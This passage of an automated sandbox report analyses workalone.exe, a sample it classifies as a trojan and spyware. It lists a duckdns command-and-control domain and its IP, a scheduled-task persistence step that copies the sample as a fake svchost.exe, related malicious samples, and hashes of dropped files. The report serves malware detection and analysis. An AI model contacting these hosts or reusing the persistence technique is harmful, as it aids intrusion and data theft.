                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp1B56.tmp.1.drfalse
                                                        high
                                                        http://schemas.xmlsoap.org/soap/actor/nextworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://ns.ado/1workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://saleshor12.duckdns.org:workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          85.208.136.178
                                                          saleshor12.duckdns.orgGermany
                                                          33657CMCSUStrue
                                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                                          Analysis ID:756291
                                                          Start date and time:2022-11-30 00:06:06 +01:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 7m 33s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:workalone.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:20
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@15/29@5/1
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HDC Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 36
                                                          • Number of non-executed functions: 1
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
                                                          • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          TimeTypeDescription
                                                          00:07:08Task SchedulerRun new task: Nafifas path: "C:\Users\user\AppData\Roaming\svchost\svchost.exe"
                                                          00:07:54API Interceptor95x Sleep call for process: workalone.exe modified
                                                          No context
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          CMCSUSSecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeGet hashmaliciousBrowse
                                                          • 141.98.6.102
                                                          SecuriteInfo.com.Win32.CrypterX-gen.3242.29307.exeGet hashmaliciousBrowse
                                                          • 171.22.30.147
                                                          SecuriteInfo.com.Win32.PWSX-gen.7894.18041.exeGet hashmaliciousBrowse
                                                          • 171.22.30.164
                                                          MV COMMON CALYPSO.xlsGet hashmaliciousBrowse
                                                          • 171.22.30.164
                                                          Order Spec.PDF.jsGet hashmaliciousBrowse
                                                          • 45.139.105.174
                                                          iDhfdMWSQB_movar.jsGet hashmaliciousBrowse
                                                          • 45.139.105.174
                                                          Parts_Photos.jsGet hashmaliciousBrowse
                                                          • 45.139.105.174
                                                          wamafa.jsGet hashmaliciousBrowse
                                                          • 45.139.105.174
                                                          LPO-17-006AD.jsGet hashmaliciousBrowse
                                                          • 45.139.105.174
                                                          file.exeGet hashmaliciousBrowse
                                                          • 171.22.30.106
                                                          file.exeGet hashmaliciousBrowse
                                                          • 171.22.30.106
                                                          file.exeGet hashmaliciousBrowse
                                                          • 171.22.30.106
                                                          file.exeGet hashmaliciousBrowse
                                                          • 171.22.30.106
                                                          file.exeGet hashmaliciousBrowse
                                                          • 171.22.30.106
                                                          file.exeGet hashmaliciousBrowse
                                                          • 171.22.30.106
                                                          QQt3XHWcOQ.exeGet hashmaliciousBrowse
                                                          • 171.22.30.147
                                                          DHL Package Delivery_pdf.exeGet hashmaliciousBrowse
                                                          • 171.22.30.164
                                                          HpBUsbfKoI.exeGet hashmaliciousBrowse
                                                          • 171.22.30.164
                                                          RFQ.xlsGet hashmaliciousBrowse
                                                          • 171.22.30.164
                                                          NEW ORDER PO137810205.xlsGet hashmaliciousBrowse
                                                          • 171.22.30.147
                                                          No context
                                                          No context
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):612
                                                          Entropy (8bit):5.33730556823153
                                                          Encrypted:false
                                                          SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21xzAbDLI4M9XKbbDLI4MWuPJKiUrRZ9I0Z7:MLUE4K5E4Ks2vsXE4qXKDE4KhK3VZ9p7
                                                          MD5:F06804B809C3212C7F29ABA89E9FAF16
                                                          SHA1:B49ED216A41EA579FF109A4BA44A8E62C2B1A3BB
                                                          SHA-256:E63AFB84BF09F02C3C19978966E610BEE5C14099B1A65C8B34E426ABC127ECB7
                                                          SHA-512:53ED48D5233FD6318320264400ACBD451A7C6B10BB2A11C2B95F51C3838708835D1016B417748E7C50023BAF179AC94CCAAE230C71AC073D0233765409341D49
                                                          Malicious:true
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.7876734657715041
                                                          Encrypted:false
                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.7876734657715041
                                                          Encrypted:false
                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.7876734657715041
                                                          Encrypted:false
                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.691266297898928
                                                          Encrypted:false
                                                          SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                          MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                          SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                          SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                          SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                          Malicious:false
                                                          Preview:AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.698711683401115
                                                          Encrypted:false
                                                          SSDEEP:24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
                                                          MD5:47643CE7571E0C995094D7CE5F2005D7
                                                          SHA1:40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
                                                          SHA-256:1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
                                                          SHA-512:3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
                                                          Malicious:false
                                                          Preview:HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.69486718145169
                                                          Encrypted:false
                                                          SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                          MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                          SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                          SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                          SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                          Malicious:false
                                                          Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.694142261581685
                                                          Encrypted:false
                                                          SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                          MD5:E9AA17F314E072EBB015265FB63E77C0
                                                          SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                          SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                          SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                          Malicious:false
